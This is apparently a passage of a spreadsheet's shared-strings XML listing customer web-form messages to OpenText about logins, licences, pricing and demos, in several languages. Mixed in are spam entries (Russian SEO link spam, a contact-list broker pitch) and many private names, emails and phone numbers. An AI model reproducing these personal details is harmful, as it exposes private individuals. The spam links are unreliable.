    <t>I cannot access my account with LAGR, LAGRB.  I requested to reset my password twice but I still have not received an email with a temporary password.</t>
  </si>
  <si>
    <t>We use 8 installations of Brava Desktop DX-P V 7.4.0.105 / Packet 7.4.0.109 and need one more license. We are thinking about upgrading the existing installations as well. Please name a reseller which we may contact in order du receive an additional license and upgrade licenses. Thank you very much in advance.</t>
  </si>
  <si>
    <t>OK, got it now. Guess it just takes awhile to load...thanks._x000D_
JH</t>
  </si>
  <si>
    <t>Wanted to read "The full story" on the Metro Vancouver deal, but all I get is a "blank" when I click on that. - OTEX shareholder. I often (print and) read these and am not unfamiliar with the process. Just thought you might like to know it isn't working for me.</t>
  </si>
  <si>
    <t>Hi_x000D_
    I am trying to login into the GXS catalog https://catalogue.gxs.com/QRSGUI/jsf/login/login.jspx. and unable to login with my credential, is there any issue going on._x000D_
_x000D_
thanks_x000D_
Anand</t>
  </si>
  <si>
    <t xml:space="preserve">FINISH LINE INC. (123178990237) _x000D_
We believe there may be a communication issue between Open Text and POR exceptions system. It seems there are several orders where the Open Text is unable to attach the UPC's automatically. </t>
  </si>
  <si>
    <t>I have respectfully asked her and now need to ask you to have Maria Ethel Narciso mnarciso@opentext.com to stop contacting me and others at my company.</t>
  </si>
  <si>
    <t>Need customer #, etc to register into "My Support/Resources" section.</t>
  </si>
  <si>
    <t>We looking a Fax server on premise for SMB, can you help us?_x000D_
_x000D_
REgards</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, _x000D_
_x000D_
I am the Software Manger for the Department of Labor and we are currently upgrading from Windows 7 to Windows 10. _x000D_
_x000D_
Can you please provide all licensing/maintenance information associated with DOL and its sub-agencies in regards to Hummingbird Exceed? _x000D_
_x000D_
Some of the agencies, if this helps, are OFCCP, OWCP, WB, ODEP, OSHA, MSHA, ETA, ILAB, ECAB, BRB, WHD, OLMS, and SOL._x000D_
_x000D_
We need the information to determine how we will proceed in regards to upgrading and purchasing more licenses. The information we had was lost during the transition of the previous librarian. _x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>Good afternoon, I am the Software Manger for the Department of Labor and we are currently upgrading from Windows 7 to Windows 10. Agencies within the Department had Hummingbird Exceed but unfortunately we can not find our license info nor do we have the source files. Can you please send all licenses purchased by the Department of Labor and its sub-agencies? We will also need the accompanying source files/setup.exe</t>
  </si>
  <si>
    <t>Project Mandate - secure a supplier platofrm to host Fleming College Digital Assets._x000D_
20-25 Users_x000D_
_x000D_
Why DAM? Commitment to ensure Fleming College remains competitive.  We will achieve this by preserving brand identity and to continuing to build brand equity. With consistency we will efficiently, effectively and strategically brand manage Fleming College interactions at all touch points and platforms. Brand awareness is highly emotional in the "sales processes" - a connection with the brand influences buying behaviour, "shopping for a post secondary institution" A stream lined approach. One central cataloged repository/library containing Fleming College digital marketing assets from all Schools and associated programs will generate positive, profitable results._x000D_
Includes:_x000D_
all creative source files (native Adobe InDesign Files)_x000D_
related collateral compliant with Fleming College branding guidelines._x000D_
Logos_x000D_
Brand Guidelines_x000D_
Calendars_x000D_
Stationary - business cards, e-signatures, letterhead_x000D_
postcard_x000D_
print adverts_x000D_
digital adverts/banners_x000D_
brochures_x000D_
registration forms_x000D_
direct mail campaign_x000D_
digital &amp;/or geo targeted campaigns - Post Media etc._x000D_
social media graphics_x000D_
trade show visuals_x000D_
You Tube films_x000D_
Corporate Presentations - Fleming College "who we are"_x000D_
School Presentations_x000D_
Internal Communications_x000D_
image gallery_x000D_
Photo Releases_x000D_
Testimonials _x000D_
_x000D_
Functionalities to include:_x000D_
Ability to:_x000D_
remotely research_x000D_
retrieve_x000D_
download_x000D_
upload_x000D_
update -edit/update/localize source file content not brand_x000D_
delete_x000D_
share collections with third party to brand management, _x000D_
key word search_x000D_
guided user navigation features_x000D_
life cycle and user rights management capabilities_x000D_
access and identity management, _x000D_
 _x000D_
_x000D_
Time line:_x000D_
December 2017_x000D_
_x000D_
Research Vendors_x000D_
_x000D_
_x000D_
Identify Primary Content Contributors_x000D_
Luke/JJ/Val/Leigh/Karen/Becky/Carrie/Student Alumni/Leoni/ plus ? = need all names/contacts_x000D_
Point person at each School - Program Stakeholders = need all names/contacts_x000D_
Q/  other l</t>
  </si>
  <si>
    <t>Interrested in IHUB pricing information as a  Reporting module to mbed in our platform</t>
  </si>
  <si>
    <t>Hello, I am looking for an evaluation of your MIM product. Could you please provide details? Thank you, Lou</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous utilisons actuellement Infolog et nous sommes intéressés par votre solution d'édition de documents</t>
  </si>
  <si>
    <t>Hallo, mein Email-Account wurde gehackt und für die Erstellung eines Zugangs/Logins bei Ihnen verwendet. Falls ein Account angelegt wurde, bitte ich diesen zu löschen._x000D_
_x000D_
Danke_x000D_
Mit freundlichen Grüßen _x000D_
Sebastian Deike</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to get a copy of Enterprise scan for one of our systems. We had a license for an older copy but were never left the install files for it. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi. I didn't set up an account on this website. Can you please remove it. </t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
je souhaite évaluer vos solutions au regard des besoins suivants : _x000D_
- GED Qualité d'une de nos filiales CRO  (contract research organization) soumise au CFR cfr21 part 11_x000D_
- GED Juridique pour le groupe HIQ Consulting_x000D_
- Gestion des contrats clients en partenariat avec notre futur ERP : Workday_x000D_
Cdlt,_x000D_
Tristan Martin</t>
  </si>
  <si>
    <t xml:space="preserve">I'm stading migration (new installation and data migration) from EMC Documentum 6.0 to New 7.3 in Docker Container Version. I need some specific information regarding how manage licence on new environment. Are you supporting this enviroment right ? Best regards </t>
  </si>
  <si>
    <t>How to create Dashboards with BIRT for inclusion in commercial product. Inc. pricing</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous sommes à la recherche d'un outil d'indexation de documents de travail permettant de retrouver facilement dans de gros gestionnaires de fichiers, un document ou son contenu (Word, Excel, Powerpoint et PDF)._x000D_
_x000D_
Merci de bien vouloir me faire savoir si l'un de vos outils est à même de répondre à cette demande._x000D_
_x000D_
Bien cordialement,_x000D_
_x000D_
Florent Coulon</t>
  </si>
  <si>
    <t>URGENT: Upcoming RFP_x000D_
_x000D_
Tomorrow (Friday 15 December) Roche (Division Pharma) will launch a global RfP to identify a replacement tool for the management and approval of promotional and non-promotional materials. Opentext has been shortlisted to participate following a market intelligence. Jaleel Shujath has been involved here but is not responsive anymore. Please confirm whether opentext would like to participate, especially given the relationship with our Genentech office in San Francisco. Please provide me with a respective contact, minimum VP level, asap. _x000D_
_x000D_
Thanks and regards,_x000D_
Sebastian Ebers</t>
  </si>
  <si>
    <t>On Saturday I received an email stating that I was now registered for support through your company yet I never signed up for anything that I am aware of. Can you please confirm why you first contacted me via my above email. Thank you.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
über die Firma BancTec GmbH setzen wir seit Jahren Ihre SW RecoStar ein._x000D_
Hierzu haben wir USB-WibuKeys, die wir aufgrund geplanter Virtualisierung unserer ICR-Einheit in SW-WibuKeys umwandeln möchten._x000D_
Bitte unterbreiten Sie uns für diesen Wechsel ein Angebot._x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
_x000D_
Sven Diethmann</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning All,_x000D_
_x000D_
We purchased Brava reader from yourselves recently. Could we get a copy of the Invoice for this order._x000D_
_x000D_
Invoice: 183648_x000D_
e-mail: mvkit@mvkelly.co.uk_x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Ben _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Request to update EU no. EU0156619 for our support team._x000D_
_x000D_
1) Siti Noorsyahira Ab. Razak - noorsyahira@malaysiaairports.com.my_x000D_
2) Mohd Nazrin Muhamad - nazrin@malaysiaairports.com.my_x000D_
3) Mohd Khairul Azhar Zulkafli - mohdkhairul@malaysiaairports.com.my_x000D_
_x000D_
There is no edit button in the personal profile page._x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>I need support access , where i am going to support Documentum , D2 and Captiva applications.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Within our company we have separate sections of the business using different business systems, Sharepoint and G-suite, with company information spread across these systems. Technical information might also be found in two Atlassian products Jira and Confluence._x000D_
Would your product provide a means of searching across these multiple repositories with a single search._x000D_
_x000D_
Regards_x000D_
_x000D_
Steve</t>
  </si>
  <si>
    <t xml:space="preserve">[url=https://indatech.ru/otvetvitelnye-korobki-i-korpusa/related/stalnye-korpusa][img]https://s8.hostingkartinok.com/uploads/images/2017/12/9a10a9d6d25071f2d85e8c5583138da4.jpg[/img][/url] _x000D_
 _x000D_
&lt;h3&gt;DowCorningOS-2,DowCorningPrimer 1200  Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt; Наконечники,гильзыKlauke Your browser indicates if you've visited this link Вы можетекупитьНаконечники,гильзыKlaukeнедорого и по выгодной цене в интернет магазине 'Уральская электротехника - торгово-монтажная компания'.  /catalog/nakonechniki-gilzy/klauke More results.&lt;br&gt; &lt;i&gt;DowCorning111: Business &amp; Industrial  eBay Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; klk47210Втулочный изолированный наконечник 1,5мм2, длина втулки 10мм (цвет по DIN46228ч.4 -  изолированный наконечник 1,5мм2, длина втулки 10мм (цвет по DIN46228ч. 1.913,91р вкл. налог. Код:klk47210 . Наличие на складе: Нет в наличии. Кол-во: 0 шт. Кол-во :.&lt;br&gt;  https://indatech.ru/markirovka-weidmueller/related/metallicheskie-vstavki ну и естественно кабель 500 мм2 Татуировки в виде штрих-кода (35 фото) Мы рекомендуем Вам  Штрих-коды стран мира, распознавание штрих-кодов онлайн &lt;/h3&gt;.&lt;br&gt; &lt;h3&gt;Приобрестикрасящаялентаmaxlm-ir300b , черная, 50 м,  Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt; Главная Химия Weicon Эпоксидные клеиVA 1401(12г)Цианоакрилатный клей -VА, артикул  1401(12г)Цианоакрилатный клей -VА, артикул  1401(12г)Цианоакрилатный клей -VА, артикул wcn12054012. Артикул: wcn12054012. В наличии. 339 Р. -. +. В   1401 (60г) Цианоакрилатный клей-VА  купить в розницу и оптом&lt;/u&gt;.&lt;br&gt; &lt;h4&gt;Принтер этикеток BRADY BMP21-PLUS  UMP&lt;/h4&gt;.&lt;br&gt; PPT -RITE-LOK ™ Анаэробные клеи и герметики  Your browser indicates if you've visited this link RITE-LOK ™ Анаэробные клеи и герметики. Air. Air. Air. Air. Анаэробные продуктыRITE-LOK ™. Что такое анаэробные клеи ? Клеи, которые отверждаются в отсутствие воздуха в контакте с металлами Slideshow 3508932 by   /luigi/rite-lok More results.&lt;br&gt; </t>
  </si>
  <si>
    <t>Hi_x000D_
I  ´m général manager of Et technology cellulaire and i want to be your partner in west  Africa (Côte d’ivoire,Togo,Benin,burkina,Nigeria ,Mali,Sénégal,Mauritanie,.).I live in Côte d’ivoire._x000D_
www.ettc-ci.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you doing great today._x000D_
_x000D_
I’m Alan, kind gestures for showing interest in our mail. We are a list compilers and dominant players in Digital Document and Customer Communication Industry._x000D_
_x000D_
Would you like to have a view in our updated database that will help in providing you with new buyers for your valuable products?_x000D_
_x000D_
Target Titles:_x000D_
_x000D_
•	CMOs/CTOs_x000D_
•	Business Development Directors/Managers_x000D_
•	Marketing and Communications Directors/Managers _x000D_
•	Business Owners/Managers _x000D_
•	Website/App Owners_x000D_
•	Heads of Digital_x000D_
•	Development/Brand Managers_x000D_
•	Web designers/Publishers/Developers_x000D_
•	Entrepreneurs_x000D_
•	Internet Marketers_x000D_
•	Website Administrators _x000D_
•	Information Architects_x000D_
•	Graphic Designers_x000D_
•	Copy Writers_x000D_
•	Web Application Developers_x000D_
•	Enterprise users_x000D_
•	Public Relations Professionals _x000D_
•	Consultants_x000D_
•	Others allied to this System_x000D_
_x000D_
Segments:_x000D_
_x000D_
•	Technology Users and Suppliers_x000D_
•	Commercial and Digital Printing Technology_x000D_
•	Electronic Document Systems/Application Development_x000D_
•	Transaction and Commercial Printers and Others_x000D_
_x000D_
You can fill in your exact Target criteria in the below mentioned format, So that I can get back to you with samples and benefits for your review._x000D_
 _x000D_
 Target Job Titles: _________ Target Industry: ______________   Target Geography: ______________x000D_
 _x000D_
We have complete contacts details and verified e-mail address across all industry._x000D_
 _x000D_
List includes: Company and Contact name, Title/Designation, Direct contact number, Verified email address, Mailing address, Fax number, Revenue size &amp; employee size, SIC/NAICS and more._x000D_
 _x000D_
List Details:_x000D_
 _x000D_
•	Format: Excel spreadsheet._x000D_
•	Quality: We provide up to 90% and anything less than that we replace with fresh contacts._x000D_
•	Benefits: Complete Ownership, Unlimited, Multichannel marketing._x000D_
 _x000D_
Look forward to your response. Thank you so much for reading my email even in your busy schedule._x000D_
 _x000D_
Thanks and Warm Regards,_x000D_
 _x000D_
Alan Mullinax_x000D_
Marketing Executive_x000D_
Business to Business| E-mail a</t>
  </si>
  <si>
    <t>Приветствую! класный у вас сайт! _x000D_
Нашел интересную базу кино:  [b] 2017 в хорошем качестве лучшие ужасы [/b] [url=http://kinoserialtv.net/]http://kinoserialtv.net/[/url] _x000D_
Здесь: http://kinoserialtv.net/drama/12259-parni-iz-beby-beeba-boys-2015.html [b] Смотреть Парни из Бебы / Beeba Boys (2015) онлайн бесплатно [/b] _x000D_
Тут: [url=http://kinoserialtv.net/drama/1984-klinika-scrubs-sezon-2-2002.html] Смотреть Клиника / Scrubs (Сезон 2) (2002) онлайн бесплатно [/url] _x000D_
Тут: http://kinoserialtv.net/drama/5576-geroi-heroes-sezon-1-4-2006-2010.html _x000D_
http://kinoserialtv.net/fentezi/ [b] фильмы фэнтези список [/b] _x000D_
[url=http://kinoserialtv.net/dokumentalnyy/] смотреть документальные фильмы 2016 [/url] _x000D_
[url=http://kinoserialtv.net/uzhasy/] Список 2017 лучшие ужасы [/url] Список 2017 лучшие ужасы</t>
  </si>
  <si>
    <t>I have regarding uploading the same document to different order numbers.  We want to know if there is a work around for this to do all at onec</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Ouassila MAHRANI. _x000D_
IT Business Analyst appointed to help LBI to set up a new tool : a digital CRM._x000D_
We are interested by your solutions._x000D_
_x000D_
LUXURY BUSINESS INSTITUTE Group is the leading consulting &amp; training company that caters to the specific niche of luxury brands, in retail and in hospitality._x000D_
_x000D_
Its expertise in based on consulting and training solutions in luxury retail (Fashion Leather goods Watches &amp; Jewelry Shoes), luxury hospitality (Hotel Industry, Back-Office Service), beauty and cosmetics (Skincare &amp; Body care Make-up Perfumes, Hair product) and lifestyle (Wine &amp; Spirit Gastronomy Arts Premium)._x000D_
_x000D_
Since 2009, LBI trained over 8,000 professionals and works with the most prestigious &amp; luxury brands._x000D_
_x000D_
LBI has two entities based in China and South Korea._x000D_
_x000D_
First of all, can you confirm us that you have already worked with clients based in China and South of Korea ? _x000D_
_x000D_
Can you send us a brochure about your solutions (possibilities, advantages, reference…etc.) and a presentation of your campany (Date of creation, current turnover, size, … etc.)?_x000D_
Thank you_x000D_
Mme MAHRANI</t>
  </si>
  <si>
    <t>Need to know what is required to create new accounts</t>
  </si>
  <si>
    <t xml:space="preserve">Aug 1, 2015 Information page about 'Transformers: Rescue Bots' (starring Lacey Chabert, Maurice LaMarche, Jason TV Programmes, TV Cartoons, Kids' TV Available Seasons: Season 1 (26 Ep), Season 2 (24 Ep), Season 3 (28 Ep). Your Family or Mine cancellation confirmed: the series will not be returning for a Second season :(  _x000D_
http://supercoolshop2.co _x000D_
29 Mar 2017 Brockmire (Wednesday, April 5, IFC), series debut: Like Kenny Fucking Powers in the late Eastbound and Down, Jim Brockmire (Hank Azaria) 'Hawaii Five-0' keeps Islands' allure in primetime: Travel Weekly	20 Sep 2015 Official say the series, entering its sixth season, has not only added a great the red-carpet season premiere of the вЂњHawaii Five-0вЂќ TV series. </t>
  </si>
  <si>
    <t>Can't login to login.opentext.com. It asks me to reset my password. So I do &amp; receive the reset email. I click the link. I put in a new password. It says my password is strong. I hit update. It says "An Error Occurred updating password". I try it again, using a different password  &amp; receive "Update Password Failed".</t>
  </si>
  <si>
    <t xml:space="preserve">We would like a price quote on LegalKey Records Management System.  We have purchased and implemented eDocs DM for our electronic records management.  Please include all maintenance fees.  </t>
  </si>
  <si>
    <t xml:space="preserve">Questions for  pertaining to OpenText™ Brava!™ desktop application_x000D_
•	Does the application track the date, time and user for specific functions?_x000D_
•	Does the application require / has option for user ID and password for all users?_x000D_
•	Where do the files reside. Where are collaboration files stored in the OpenText™ Brava!™ desktop application?_x000D_
thanks_x000D_
</t>
  </si>
  <si>
    <t>Support to have access to open a ticket. At this moment my account do not has access to open a ticket.</t>
  </si>
  <si>
    <t>Gostaria de saber a agenda de cursos para 2018 e valores. Estou a procura de treinamentos para Archive Server / Content Server / IXOS e Dazel</t>
  </si>
  <si>
    <t>Solicitamos enviar-nos, se possível, lista de empresas parceiras nos softwares Keyfile e Keyflow._x000D_
Grato</t>
  </si>
  <si>
    <t>Looking at OpenText for our legal department. I would like to set up a product demo to see if the product might be a good fit.</t>
  </si>
  <si>
    <t>need TD 7 key for   Lic # 10651417, bought via HWF, Germany._x000D_
Want access to support portal, still not enabled!</t>
  </si>
  <si>
    <t xml:space="preserve">Please provide my Support account same access as my colleague as Phadke, Anurag &lt;APhadke@StateStreet.com&gt;. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Please pass this along to the person who manages your company’s document translation needs. Thank you very much!_x000D_
_x000D_
Do you need to deliver contextually accurate translated documents to employees, suppliers, clients, or business partners?    _x000D_
_x000D_
EPIC Translations has been translating global documents and websites for over a decade and has vetted more than 20,000 experienced international linguists._x000D_
_x000D_
Starting immediately, EPIC Translations can help you to:_x000D_
1.	Provide better translation quality for your global documents_x000D_
2.	Reduce translation-related costs_x000D_
3.	Increase global market share_x000D_
4.	Stay ahead of competitors_x000D_
_x000D_
Our experienced team will deliver professional documents that have been expertly translated. We support English, French, German, Spanish, Japanese, Portuguese, Arabic, Italian, and Chinese, as well as dozens of other languages._x000D_
We are just a click away, try us today!</t>
  </si>
  <si>
    <t>I cannot access the support site.  I am asked to send a confirmation email, I do so, I activate my account, and then it just asks me to send the confirmation email again.  It is a loop that I cannot get out of.  Can someone please activate my account?  I need to get to the download site right away</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for Enterprise document management system hosted in the cloud and in the process of evaluating right software product. I would like to understand further details on Documentum platform. </t>
  </si>
  <si>
    <t xml:space="preserve">Could someone please contact me regarding the Opentext Documentum offering please. I would like more deatils both on the product. I would like to more quickly on this so a response would be much appreciated. Thanks Malcolm Gordon  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
At any given point in time, nearly 4,000 Ontario children are in active cancer treatment or follow-up care. For the last 35 years, the Pediatric Oncology Group of Ontario (POGO) has been championing childhood cancer care, ensuring that children and families have access to the best possible care for the best possible outcomes. We’re the official source of advice to the Ministry of Health and Long-Term Care and the Ministry supports clinical activities at our partner hospitals and the coordination of cancer care across our clinics. _x000D_
_x000D_
However, there are critical programs that fall outside of the Ministry’s realm of support and which rely on private sector funding. I’ve read through OpenText’s corporate giving guidelines and would appreciate the opportunity to chat with someone from the corporate giving/CSR team to learn more about the types of programs you support and see if there are opportunities for partnership. _x000D_
_x000D_
Please contact me at tmavalvala@pogo.ca or at 416-592-1232 ext. 233._x000D_
_x000D_
Thanks, I look forward to hearing from you._x000D_
_x000D_
Tanya Mavalvala_x000D_
Development Officer | tmavalvala@pogo.ca| www.pogo.ca _x000D_
480 University Ave. Suite 1014 | Toronto, ON M5G 1V2_x000D_
Phone: 416-592-1232 Ext. 233 | Toll-Free: 1-855-FOR-POGO (367-7646) | Fax: 416-592-1285_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Greetings from Navayuga Infotech…_x000D_
_x000D_
I am Adithya working as Assoc. Executive- Business Development @ Navayuga Infotech, Hyderabad._x000D_
_x000D_
This email is in regards to a tender opportunity with Delhi Development Authority and we are looking for a partner who can help us in providing a Document Management System. _x000D_
Please let us know if you have a similar solution.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Could you tell me if we can purchase Brava! Desktop TXL with floating licence. If yes, could you tell me on which Licence server is it running  ? (ie. flexLM ? Lum ? ...) _x000D_
I want to install it everywhere but users will be able to use it thanks to a network licence.If I buy 10 licence, and if 10 users are using it the same time, the 11th will not be able to use it. But he will try again later when some other users will have closed the brava software. I hope I am clear enough. Thanks for your feedback _x000D_
Best regards _x000D_
_x000D_
TB</t>
  </si>
  <si>
    <t>good morning.  I am seeking some information on the specs for what features are incorporated in eDocs.  I am particularly interested in the aspects related to metadata capabilities, management of physical records, cross reference with electronic records.  Additionally, I am interested in creation of reports, process dashboards, and workflow management.  can you assist?</t>
  </si>
  <si>
    <t>Necessitamos da senha de conexão do sftp do cliente CIATC, mudamos de Datacenter e não possuímos a informação._x000D_
Obrigado.</t>
  </si>
  <si>
    <t xml:space="preserve">Gostaríamos de saber mais informações como funciona essa solução de fax e valores. </t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm contacting you with the aim of receiving information from your side regarding the requirements needed in case of implementing an Scanner in order to process the AP Invoices received from our Suppliers._x000D_
Today, we are handling the supplier invoices manually, and we need to automatize this process electronically, so we would like to talk to you or receive information via email._x000D_
_x000D_
Thanks_x000D_
Regards.</t>
  </si>
  <si>
    <t>Preisliste für OpenText Data Archiving for SAP® Solutions</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir sind derzeit in der Markterkundung bzgl. einer Lösung zur elektronischen Personalaktenführung. Im Personalwesen wird SAP HCM eingesetzt._x000D_
Wäre es möglich, dass Sie uns in einem Webcast (ca. 1 Stunde) einen ersten Einblick in die Lösung von Open Text geben?_x000D_
Viele Grüße,_x000D_
Manfred Pürzer</t>
  </si>
  <si>
    <t xml:space="preserve">ATTENTION:_x000D_
PRESIDENT &amp; CEO_x000D_
_x000D_
_x000D_
To whom this may concern,_x000D_
 _x000D_
Good day! May this letter find you in good spirits!_x000D_
 _x000D_
We are sending you this letter to request for your kind assistance and call the attention of MS. MARI CRISTINA GESLANI whom we learned employed to your good company OPENTEXT. We humbly ask for your assistance to advise the above mentioned employee to call our office about a very important legal matter and for us to complete our INITIAL REPORT._x000D_
 _x000D_
We look forward to your favorable response and will appreciate whatever assistance you may give pertaining to our request. You may reach us through the following telephone numbers +632-463 1209, +63-9089814651  or  you may send us an Email at dlvzlegalservices@gmail.com upon receipt of this letter for any information of the said subject._x000D_
 _x000D_
We are hoping for your utmost and immediate attention regarding on this matter and We highly Appreciate Your response after you read this message._x000D_
 _x000D_
             Thank You and MORE POWER!_x000D_
 _x000D_
Best Regards,_x000D_
 _x000D_
Hermes Monares_x000D_
DELVAZ LAW_x000D_
U-402 CRM BLDG. 2_x000D_
116 kASING-KASING ST. COR. KAMIAS ROAD_x000D_
EAST KAMIAS, QUEZON CITY,  PHILIPPINES_x000D_
LANDLINE: 632 463 1209_x000D_
MOBILE NO.: 63 908 9814651_x000D_
E-MAIL ADDRESS: dlvzlegalservices@gmail.com_x000D_
WEBSITE: www.delvazlaw.com_x000D_
 _x000D_
 _x000D_
IMPORTANT NOTICE:_x000D_
            This email and any attachments hereto may be confidential and are intended solely for the use of the individual to whom it is addressed. If you are not the intended recipient, you must not use or disseminate the information. If you have received this email in error, please immediately notify the sender by using the "Reply" command and permanently delete the original and any copies or printouts thereof. Although this email and any attachments are believed to be free of any virus or other defect that might affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free and no responsibility is accepted by </t>
  </si>
  <si>
    <t>My company will send a Request for Information for the renewal of its Digital Mailroom solution. I need a contact person to send the RFI document. My company is located in the french speaking part of Switzerland and I would appreciate to exchange in french with your company.</t>
  </si>
  <si>
    <t>We want to optimize the document management process and we are now want to buy tools for this project.</t>
  </si>
  <si>
    <t>Please, I have a customer in Nigeria that urgently needs Electronic Document Management for his e-mail platform (Insurance company). Kindly contact me immediately for further engagement or if there are any questionnaire you want to send across to share with the customer. _x000D_
Thanks.</t>
  </si>
  <si>
    <t>We would like to put our second AFP viewer license on another PC. Thx for your support.</t>
  </si>
  <si>
    <t>I am requesting a quote and requirement spec for a right fax services for 6000 user base customer, preferred to host on-prem solution I am happy to be discussed if you have any queries.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I've been working for a while with CS, and I want to pass the certification exam for Business Consultant CS16. Can I pass the exam without taking the courses?_x000D_
_x000D_
Regards,_x000D_
Hichem</t>
  </si>
  <si>
    <t>We have recently implemented SAP S4 Hana and are interested in the Open Text solution for invoice management that integrates with SAP.  We currently have a 3rd party solution that is not integrated with SAP.</t>
  </si>
  <si>
    <t>We are looking for an OCR solution to process our Inbound documents and create a SAP Document. We would like more details on what OpenText can offer and what would that OCR solution look like in our business model.</t>
  </si>
  <si>
    <t xml:space="preserve">I see that your company is exhibiting at the LegalTech New York 2018._x000D_
Would you be interested in acquiring the contacts of professionals attending it?_x000D_
</t>
  </si>
  <si>
    <t>Please send over an updated W9 at your convenience. This will help us pay you in a punctual manner in the future. If you have any questions please call me._x000D_
_x000D_
Thank you for your time_x000D_
_x000D_
Abe Siliman</t>
  </si>
  <si>
    <t xml:space="preserve">messed up when I submitted the Registration e-mail address  _x000D_
</t>
  </si>
  <si>
    <t>The Dept. of Veterans Affairs would like to observe a demo of Documentum Records Management in support of our electronic record keeping efforts.  We have a list of specific capabilities we would like to see that we can share.</t>
  </si>
  <si>
    <t>We are interested in your document management system and would like to get schedule a demo.</t>
  </si>
  <si>
    <t>Joe Ernst was my contact at Open Text, I need to renew and need someone to give me a quote for 2018</t>
  </si>
  <si>
    <t>Hi, _x000D_
I have been trying to contact a sales person here for over a week now, I was previously dealing with Saood Javed and I believe he has now left, can someone splease get in touch</t>
  </si>
  <si>
    <t>there are no active administrators on the FAA account. I need to have my permissions changed to create tickets.</t>
  </si>
  <si>
    <t>Trying to download EIM in the cloud but your form is broken (ironic). I tried two browsers (IE and Chrome). It asks for Industry to be provided but that can't be selected. Please fix the form and please send me the PDF (EIM in the cloud) direct?</t>
  </si>
  <si>
    <t>Need guidance on training requirement in Ottawa Canada._x000D_
I have called the ottawa office 2 to 3 weeks ago inregards to these trainings._x000D_
3363 Vignette Integrated Document System Administration_x000D_
http://www.opentext.com/training/coursedetails.html?id=1838_x000D_
_x000D_
2361 Vignette Case Manager Foundation: Configuring Business Processes_x000D_
http://www.opentext.com/training/coursedetails.html?id=1844_x000D_
_x000D_
1361 Vignette Record Manager: Configuring the File Plan_x000D_
http://www.opentext.com/training/coursedetails.html?id=1845_x000D_
I was wondering if they where available in Ottawa or Online the course I was realy interested in was 1361._x000D_
Thank you</t>
  </si>
  <si>
    <t>Need to know how to register my new Hummingbird fish finder!</t>
  </si>
  <si>
    <t xml:space="preserve">Are you having any issues today? I am unable to log into the system. </t>
  </si>
  <si>
    <t>I want to register my new fish finder and can't figure out how to do it!</t>
  </si>
  <si>
    <t>I'd like to find out who our sales contact is for OpenText.  We use RightFax today and it was set up using Instant Info Systems, but I understand we now need to work directly with OpenText.  I'd like to inquire about software upgrades and the overall RightFax roadmap.</t>
  </si>
  <si>
    <t xml:space="preserve">STOP IT_x000D_
STOP IT_x000D_
STOP IT_x000D_
STOP IT_x000D_
STOP IT_x000D_
STOP IT_x000D_
STOP IT_x000D_
_x000D_
2nd time today + yesterday_x000D_
1) I have NOT registered with OpenText _x000D_
2) I'm NOT INTERESTED_x000D_
3) the next time this will be treated as SPAM and reported_x000D_
    no consent = spamming a Canadian business = $100,000 fines per case_x000D_
_x000D_
From: connect@opentext.com [mailto:connect@opentext.com] _x000D_
Sent: Monday, December 11, 2017 11:11 AM_x000D_
To: andy@add-color.com_x000D_
Subject: OpenText Connect - Registration Confirmation_x000D_
_x000D_
Registration Confirmation_x000D_
Dear Andy Rupp, _x000D_
Congratulations! You now have access to the Online Support Resources available through My Support._x000D_
Your User ID: andy@add-color.com_x000D_
Welcome and FAQ:http://www.opentext.com/support/get-support_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
I was told through another webinar that Feb 13 would have a What's new with Extended File Share with Core._x000D_
_x000D_
I can not find this on the schedule. Is it still to be added?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Zepporah</t>
  </si>
  <si>
    <t>to get further details on the RightFax product and pricing.</t>
  </si>
  <si>
    <t>We need know your products.</t>
  </si>
  <si>
    <t>I am interested in IRM for document control, and your content mgmt. software came up in a search. I would like to easily provide access control (set passwords, length-of-time access, kill access on demand, etc). Does your software do that, and what is the price?_x000D_
Thanks</t>
  </si>
  <si>
    <t>We would like to include you in an RFI that we will be launching in regards to our billing and payment services. Could you please provide me the name and email address of the contact within your organization who you would to receive the RFI?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
_x000D_
We are looking for a faxing solution that works with our JDE ERP. I'll like to hear beack from Opentext about their fax2email solution and see if it suits our needs._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Vikash </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, _x000D_
_x000D_
als EY Advisory beraten wir aktuell ein großes deutsches Industrieunternehmen bei der Auswahl eines ECM/EIM Systems. _x000D_
_x000D_
Daher würde ich mich freuen, wenn Sie mir zeitnah selektionsrelevante Informationen bezüglich Funktionalität, User Interface, Implementierung, Beraterverfügbarkeit, Integration mit Office/SAP, Kosten etc. zusenden könnten._x000D_
_x000D_
Vielen Dank und beste Grüße_x000D_
Pascal Schorge</t>
  </si>
  <si>
